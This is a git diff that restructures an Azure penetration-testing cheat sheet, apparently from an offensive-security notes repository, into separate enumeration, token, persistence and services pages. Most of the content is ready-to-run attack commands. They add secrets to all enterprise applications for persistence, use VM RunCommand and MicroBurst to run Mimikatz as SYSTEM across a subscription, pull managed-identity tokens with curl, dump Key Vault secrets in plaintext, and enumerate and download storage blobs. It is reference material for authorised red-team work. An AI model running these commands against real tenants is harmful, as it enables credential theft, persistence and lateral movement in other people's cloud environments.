diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md index 93a2290..a220d7a 100644 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -14,14 +14,6 @@ * [Stealing Tokens](#stealing-tokens) * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) -* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications) -* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app) -* [Azure Storage Blob](#azure-storage-blob) - * [Enumerate blobs](#enumerate-blobs) - * [SAS URL](#sas-url) - * [List and download blobs](#list-and-download-blobs) -* [Virtual Machine RunCommand](#virtual-machine-runcommand) -* [KeyVault Secrets](#keyvault-secrets) * [Pass The Certificate](#pass--the-certificate) * [Pass The PRT](#pass-the-prt) * [Intunes Administration](#intunes-administration) @@ -188,81 +180,6 @@ ``` * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API - -## Enumeration - -## Enumeration methodology - -```powershell -# Check Azure Joined -PS> dsregcmd.exe /status -+----------------------------------------------------------------------+ -| Device State | -+----------------------------------------------------------------------+ - AzureAdJoined : YES - EnterpriseJoined : NO - DomainJoined : NO - Device Name : jumpvm - -# Enumerate resources -PS Az> Get-AzResource - -# Enumerate role assignments -PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/` - -# Get info on a role -PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor" - -# Get info user -PS AzureAD> Get-AzureADUser -ObjectId -PS AzureAD> Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl * - -# List all groups -PS AzureAD> Get-AzureADGroup -All $true - -# Get members of a group -PS Az> Get-AzADGroup -DisplayName '' -PS Az> Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName - -# Get Azure AD information -PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 -PS AADInternals> Get-AADIntLoginInformation -UserName admin@.onmicrosoft.com -PS AADInternals> Get-AADIntTenantID -Domain .onmicrosoft.com # Get Tenant ID -PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName # Get all the information - -# Check if there is a user logged-in to az cli -PS> az ad signed-in-user show - -# Check AppID Alternative Names/Display Name -PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl - - -# Get all application objects registered using the current tenant -PS AzureAD> Get-AzureADApplication -All $true - -# Get all details about an application -PS AzureAD> Get-AzureADApplication -ObjectId | fl * - -# List all VM's the user has access to -PS Az> Get-AzVM -PS Az> Get-AzVM | fl - -# Get all function apps -PS Az> Get-AzFunctionApp - -# Get all webapps -PS Az> Get-AzWebApp -PS Az> Get-AzWebApp | select-object Name, Type, Hostnames - -# List all storage accounts -PS Az> Get-AzStorageAccount -PS Az> Get-AzStorageAccount | fl - -# List all keyvaults -PS Az> Get-AzKeyVault -``` - - ## Token from Managed Identity > **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. @@ -430,123 +347,6 @@ az account get-access-token --resource-type aad-graph * Users can save tokens using `Save-AzContext` -## Add credentials to all Enterprise Applications - -```powershell -# Add secrets -PS > . C:\Tools\Add-AzADAppSecret.ps1 -PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose - -# Use secrets to authenticate as Service Principal -PS > $password = ConvertTo-SecureString '' -AsPlainText -Force -PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) -PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' -``` - -## Spawn SSH for Azure Web App - -```powershell -az webapp create-remote-connection --subscription --resource-group -n -``` - -## Azure Storage Blob - -* Blobs - `*.blob.core.windows.net` -* File Services - `*.file.core.windows.net` -* Data Tables - `*.table.core.windows.net` -* Queues - `*.queue.core.windows.net` - -### Enumerate blobs - -```powershell -PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 -PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt -Found Storage Account - testsecure.blob.core.windows.net -Found Storage Account - securetest.blob.core.windows.net -Found Storage Account - securedata.blob.core.windows.net -Found Storage Account - securefiles.blob.core.windows.net -``` - -### SAS URL - -* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) -* Click on **Open Connect Dialog** in the left menu. -* Select **Blob container**. -* On the **Select Authentication Method** page - * Select **Shared access signature (SAS)** and click on Next - * Copy the URL in **Blob container SAS URL** field. - -:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. - -### List and download blobs - -```powershell -PS Az> Get-AzResource -PS Az> Get-AzStorageAccount -name -ResourceGroupName -PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob -``` - -## Virtual Machine RunCommand - -Requirements: -* `Microsoft.Compute/virtualMachines/runCommand/action` - -```powershell -# Get Public IP of VM : query the network interface -PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile -PS AzureAD> Get-AzNetworkInterface -Name -PS AzureAD> Get-AzPublicIpAddress -Name - -# Execute Powershell script on the VM -PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose - -# Connect via WinRM -PS C:\Tools> $password = ConvertTo-SecureString '' -AsPlainText -Force -PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password) -PS C:\Tools> $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) -PS C:\Tools> Enter-PSSession $sess -``` - -> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System - -```powershell -# List available VMs -PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name -ResourceGroupName Name ------------------ ---- -TESTRESOURCES Remote-Test - -# Execute Powershell script on the VM -PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 -``` - -Against the whole subscription using MicroBurst.ps1 - -```powershell -Import-module MicroBurst.psm1 -Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt -``` - - -## KeyVault Secrets - -```powershell -# keyvault access token -curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER -curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER - -# connect -PS> $token = 'eyJ0..' -PS> $keyvaulttoken = 'eyJ0..' -PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken - -# query the vault and the secrets -PS Az> Get-AzKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText -``` - ## Pass The PRT > MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 0090ccc..d101acf 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -1,5 +1,19 @@ # Azure AD Tokens +## Connection + +After a successfull authentication, you will get an access token. + +* az cli +* Azure AD Powershell +* Az Powershell +* External HTTP API +* Internal HTTP API + ```ps1 + curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER + curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER + ``` + ## Access Token diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md index 39073b6..81f3791 100644 --- a/docs/cloud/azure/azure-devices-users-services.md +++ b/docs/cloud/azure/azure-devices-users-services.md @@ -9,10 +9,21 @@ ## Users * List users: `Get-AzureADUser -All $true` -* Enumerate groups: `Get-AzureADGroup -All $true` +* Enumerate groups + + ```ps1 + # List groups + Get-AzureADGroup -All $true + + # Get members of a group + Get-AzADGroup -DisplayName '' + Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName + ``` + * Enumerate roles: `Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember` * List roles: `Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName` * Add user to a group + ```ps1 $groupid = "" $targetmember = "" @@ -49,6 +60,20 @@ Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true ``` +### Device State + +```ps1 +PS> dsregcmd.exe /status ++----------------------------------------------------------------------+ +| Device State | ++----------------------------------------------------------------------+ + AzureAdJoined : YES + EnterpriseJoined : NO + DomainJoined : NO + Device Name : jumpvm +``` + + ### Join Devices * [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device) diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index 05fede3..226b2c2 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -20,16 +20,19 @@ * Federation with Azure AD or O365 ```powershell + Get-AADIntLoginInformation -UserName @.onmicrosoft.com https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 https://login.microsoftonline.com/getuserrealm.srf?login=root@.onmicrosoft.com&xml=1 ``` * Get the Tenant ID ```powershell + Get-AADIntTenantID -Domain .onmicrosoft.com https://login.microsoftonline.com//.well-known/openid-configuration https://login.microsoftonline.com/.onmicrosoft.com/.well-known/openid-configuration ``` + ### Enumerate Email > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. @@ -60,6 +63,7 @@ PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Ve Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/) ```ps1 +Invoke-AADIntReconAsOutsider -DomainName Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table ``` @@ -80,13 +84,33 @@ Subdomain Service * Using Az Powershell module ```powershell + # Enumerate resources PS Az> Get-AzResource - PS Az> Get-AzVM | fl + + # List all VM's the user has access to + PS Az> Get-AzVM + + # Get all webapps PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} + + # Get all function apps PS Az> Get-AzFunctionApp - PS Az> Get-AzStorageAccount | fl + + # List all storage accounts + PS Az> Get-AzStorageAccount + + # List all keyvaults PS Az> Get-AzKeyVault + + # Get all application objects registered using the current tenant + PS AzureAD> Get-AzureADApplication -All $true + + # Enumerate role assignments + PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/ PS Az> Get-AzRoleAssignment -SignInName test@.onmicrosoft.com + + # Check AppID Alternative Names/Display Name + PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl ``` * Using az cli diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md new file mode 100644 index 0000000..efcb9b9 --- /dev/null +++ b/docs/cloud/azure/azure-persistence.md @@ -0,0 +1,16 @@ +# Azure Persistence + +## Add secrets to application + +* Add secrets with [lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1](https://github.com/lutzenfried/OffensiveCloud/blob/main/Azure/Tools/Add-AzADAppSecret.ps1) + ```powershell + PS > . C:\Tools\Add-AzADAppSecret.ps1 + PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose + ``` + +* Use secrets to authenticate as Service Principal + ```ps1 + PS > $password = ConvertTo-SecureString '' -AsPlainText -Force + PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) + PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' + ``` \ No newline at end of file diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index ab0eec0..aeb2483 100644 --- a/docs/cloud/azure/azure-services.md +++ b/docs/cloud/azure/azure-services.md @@ -1,6 +1,52 @@ # Azure Services -## Azure Runbook +## Virtual Machine + +### RunCommand + +> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as `NT Authority\System` + +**Requirements**: +* `Microsoft.Compute/virtualMachines/runCommand/action` + +* List available Virtual Machines + ```powershell + PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name + ResourceGroupName Name + ----------------- ---- + TESTRESOURCES Remote-Test + ``` + +* Get Public IP of VM by querying the network interface + ```powershell + PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile + PS AzureAD> Get-AzNetworkInterface -Name + PS AzureAD> Get-AzPublicIpAddress -Name + ``` + +* Execute Powershell script on the VM, like `adduser` + ```ps1 + PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose + PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 + ``` + +* Finally you should be able to connect via WinRM + ```ps1 + $password = ConvertTo-SecureString '' -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential('username', $Password) + $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) + Enter-PSSession $sess + ``` + +Against the whole subscription using `MicroBurst.ps1` + +```powershell +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` + + +## Runbook Runbook must be **SAVED** and **PUBLISHED** before running it. @@ -41,7 +87,7 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. ``` -## Azure Service Principal +## Service Principal * Generate a new service principal password/secret ```ps1 @@ -58,6 +104,75 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. ``` +## KeyVault + +* Keyvault access token + ```powershell + curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER + ``` + +* Connect with the access token + ```ps1 + PS> $token = 'eyJ0..' + PS> $keyvaulttoken = 'eyJ0..' + PS> $accid = '2e...bc' + PS Az> Connect-AzAccount -AccessToken $token -AccountId $accid -KeyVaultAccessToken $keyvaulttoken + ``` + +* Query the vault and the secrets + ```ps1 + PS Az> Get-AzKeyVault + PS Az> Get-AzKeyVaultSecret -VaultName + PS Az> Get-AzKeyVaultSecret -VaultName -Name Reader -AsPlainText + ``` + + +## Azure Storage Blob + +* Blobs - `*.blob.core.windows.net` +* File Services - `*.file.core.windows.net` +* Data Tables - `*.table.core.windows.net` +* Queues - `*.queue.core.windows.net` + +### Enumerate blobs + +```powershell +PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 +PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt +Found Storage Account - redacted.blob.core.windows.net +``` + +### List and download blobs + +```powershell +PS Az> Get-AzResource +PS Az> Get-AzStorageAccount -name -ResourceGroupName +PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context +PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob +``` + +### SAS URL + +* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) +* Click on **Open Connect Dialog** in the left menu. +* Select **Blob container**. +* On the **Select Authentication Method** page + * Select **Shared access signature (SAS)** and click on Next + * Copy the URL in **Blob container SAS URL** field. + +:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. + + +## Azure Web App + +### SSH Connection + +```powershell +az webapp create-remote-connection --subscription --resource-group -n +``` + + ## Azure Devops * Verify the validity of an Azure Personal Access Token (PAT)